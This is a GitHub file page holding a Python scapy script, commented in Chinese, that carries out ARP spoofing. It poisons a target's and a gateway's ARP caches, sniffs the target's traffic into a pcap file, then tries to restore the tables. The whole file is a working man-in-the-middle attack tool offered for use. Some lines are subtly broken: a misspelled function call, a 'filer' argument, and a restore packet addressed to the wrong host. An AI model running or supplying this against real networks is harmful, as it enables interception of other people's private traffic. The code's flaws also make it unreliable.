-
Notifications
You must be signed in to change notification settings - Fork 0
/
arp spfloos .py
136 lines (75 loc) · 2.9 KB
/
arp spfloos .py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "" #目標ip
gateway_ip = "" #設置gateway_ip
packet_count=1000
#設定要用的介面
conf.iface = interface
#關掉輸出
conf.verb = 0
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
#有點不同的做法,用send
print("[*] Restoring target ....")
send(ARP(op = 2 ,psrc = gateway_ip ,pdst = target_ip, hwdst = "ff:ff:ff:ff:ff:ff" , hwsrc = gateway_mac ),count=5)
send(ARP(op = 2 ,psrc = target_ip ,pdst = target_ip, hwdst = "ff:ff:ff:ff:ff:ff" , hwsrc = target_mac ),count=5)
#通知主thread結束
os.kill(os.getpid(),signal.SIGINT)
def get_mac(ip_address):
responses,unanswered =srp(Ether(dst ="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout = 2,retry = 10)
#回傳回應裡的Mac位址
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target =ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print("[*] Beginning the ARP poison.[CTRL-C to stop]")
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
retore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print("[*] ARP poison attack finished.")
return
print("[*] Setting up %s " % interface)
gateway_mac = get_mac (gateway_ip)
if gateway_mac is None:
print("[!!!] Failed to get gateway MAC. Exiting.")
sys.exit(0)
else:
print("[*] Gateway %s is at %s" % (gateway_ip,gateway_mac))
target_mac = get_mac(target_ip)
if target_mac is None:
print("[!!!] Failed to get target MAC. Exiting.")
sys.exit(0)
else:
print("[*] Target %s is at %s" % (target_ip,target_mac))
#啟動汙染thread
poison_thread = threading.Thread(target =poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print("[*] Starting sniffer for %d packet" % packet_count)
bpf_filter = "ip host %s" % target_ip
packets = sniff(count = packet_count,filer = bpf_filter,iface=interface)
#輸出捕抓到的封包
wrpcap('arper.pcap',packets)
#恢復網路
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
except KeyboardInterrupt:
#恢復網路
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)